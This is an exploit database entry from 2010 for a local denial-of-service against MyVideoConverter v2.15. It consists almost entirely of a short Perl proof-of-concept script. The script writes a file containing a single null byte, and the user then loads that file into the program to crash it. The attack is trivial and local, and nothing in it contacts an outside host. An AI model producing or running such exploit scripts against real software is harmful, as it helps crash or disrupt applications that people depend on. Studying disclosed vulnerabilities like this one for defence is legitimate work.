id: 11641
date: 04/05/2010
title: MyVideoConverter v2.15 Local DoS
author: chap0
cves: 

================================
MyVideoConverter v2.15 Local DoS
================================

# Exploit Title: MyVideoConverter Local DoS
# Date: April 5, 2010
# Software Link: [http://www.ivideogo.com/]
# Version: 2.15
# Tested on: Windows XP SP3
# Author: chap0
# Email:  chap0x90[at]gmail[dot]com
#
#!/usr/bin/perl
 
my $file = "hmm.vro";
my $null = "\x00";
 
open (FILE, ">$file");
print FILE "$null";
 
print "Done. . . Add file -> click Start.\n"



#  0day.today [2023-03-27]  #